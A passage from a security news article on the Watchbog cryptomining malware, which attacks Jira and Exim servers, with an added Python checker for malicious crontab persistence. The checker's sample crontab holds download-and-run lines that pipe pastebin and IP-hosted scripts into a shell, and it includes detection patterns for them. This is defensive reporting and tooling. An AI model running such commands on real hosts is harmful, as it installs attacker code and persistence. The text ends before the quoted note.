Watchbog is a malware strain used to attack Linux servers running vulnerable software such as Jenkins, Nexus Repository Manager 3, ThinkPHP and Supervisord; it was spotted by Alibaba Cloud Security researchers during a campaign in May.

Targeting Exim and Jira vulnerabilities

The latest version, detected by an Intezer Labs researcher on VirusTotal, uses malicious payloads to exploit CVE-2019-11581, the 12-day-old Jira template injection vulnerability that leads to remote code execution. This new version of the strain was found by polarply. It will also abuse CVE-2019-10149, a remote flaw that allows attackers to execute commands as root after exploitation, an Exim vulnerability known to have been exploited in the wild at least since 9 June. According to a recent Shodan search, more than 1,610,000 Exim servers and, as per BinaryEdge, over 54,000 vulnerable Atlassian JIRA hosts could be affected by this attack. The strain is very hard to detect: the Watchbog sample spotted by polarply has a detection ratio of 0/55 across VirusTotal's antivirus engines. More information can be found on Intezer Analyze.
Patch Patch Patch! Add to Intezer Analyze – https://t.co/hWZBCHNjxM pic.twitter.com/6s7bXCfV9d — polarply (@polarply) July 22, 2019

Infecting Linux hosts

The infection process used by Watchbog is fairly simple: after exploiting the vulnerability it targets, it kills any Monero coinminer left behind by other actors who managed to hit the same host. Watchbog then downloads and runs malicious pastebin scripts once it has gained a foothold on the vulnerable host; these eventually deploy and run the final cryptocurrency miner payload on the compromised Linux box. The malware also persists by adding itself to several crontab files, so that it can come back and reinfect the system if the user does not clean every crontab that was modified.

Watchbog attack process (image: Alibaba Cloud Security)
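As an added defender-side illustration (not code from the article, nor from Alibaba Cloud Security or Intezer), the following Python checker looks for the crontab persistence pattern described above: it parses crontab entries and flags commands that fetch a pastebin script, pipe a download straight into a shell, or decode base64 into a shell. The crontab text, hostnames and paste ID are constructed for the example.

```python
import re
from typing import List, Tuple

# Crontab content constructed for this example; it is not a real Watchbog sample.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/bash
0 3 * * * /usr/bin/apt-get update
*/5 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLEID | bash
@reboot wget -q -O - http://203.0.113.5/x.sh | sh
0 * * * * echo ZWNobyBoaQ== | base64 -d | sh
30 6 * * 1 /usr/local/bin/backup.sh
"""

# Patterns that characterise "download-and-execute" persistence entries.
INDICATORS = [
    ("pastebin", re.compile(r"pastebin\.com", re.I)),
    ("pipe-to-shell", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b", re.I)),
    ("base64-to-shell", re.compile(r"base64\s+(?:-d|--decode)[^|]*\|\s*(?:ba)?sh\b", re.I)),
]

_SCHEDULE_FIELDS = 5  # minute hour day-of-month month day-of-week


def _command_part(line: str) -> str:
    """Return the command portion of a crontab line, after the schedule fields."""
    # "@reboot", "@daily" etc. are a single schedule token instead of five.
    fields = 1 if line.startswith("@") else _SCHEDULE_FIELDS
    parts = line.split(None, fields)
    return parts[fields] if len(parts) > fields else ""


def scan_crontab(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, indicator_name, command) for every suspicious entry."""
    findings = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        # Skip blanks, comments and environment assignments such as SHELL=/bin/bash.
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        command = _command_part(line)
        for name, pattern in INDICATORS:
            if pattern.search(command):
                findings.append((number, name, command))
                break  # one indicator per entry is enough to report it
    return findings


if __name__ == "__main__":
    for number, name, command in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {number}: {name}: {command}")
```

On a live host the same function can be run over the output of `crontab -l` for each user and over the files under /etc/cron.d, which are the locations a cleanup has to cover in full.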
According to the coin mining configuration file, this variant uses the mining pool minexmr.com, as did the previous versions of Watchbog, and it collects all the proceeds at the 47k2wdnyBoMT6N9ho5Y7uQg1J6gPsTboKP6JxfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 address that was also used during the campaign targeting Jenkins servers in May.
Payment address

Aside from the absence of VirusTotal detections and the switch in targets to Jira and Exim hosts, there is one more thing that makes this specific Watchbog variant special: the malicious script it uses to drop the miner on compromised Linux servers also includes a contact note for its victims. While in previous versions of the malware the attackers would only offer their services to remove an infection, promising to send the victim a "cleaning script," "the source of the entry and patch," this variant notes that "the mission of the attacker is to safeguard the internet." The following note is included in the malicious script: